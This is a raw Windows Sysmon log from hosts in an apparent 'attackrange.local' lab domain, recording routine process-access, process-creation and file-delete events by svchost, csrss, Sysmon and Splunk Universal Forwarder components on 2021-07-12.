07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.995{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2DA-60EB-3F79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.980{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2DA-60EB-3F79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.980{0C1E0330-F2DA-60EB-3F79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.636{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF65A053BEA574591998FDD9C246F52F,SHA256=09ABFDA1E83743F76CABDC1A5DFC1E5383955AE70D652522DCBC0239EE7C6960,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2DA-60EB-3E79-00000000D001}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F2DA-60EB-3E79-00000000D001}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.308{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2DA-60EB-3E79-00000000D001}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.293{0C1E0330-F2DA-60EB-3E79-00000000D001}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.011{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FC448D2D37965AE2AC15A0A822BD140,SHA256=A64D56CF6E2C78C8A9A092F7A0350BE5A80948C6923F7256546C2D556C441898,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 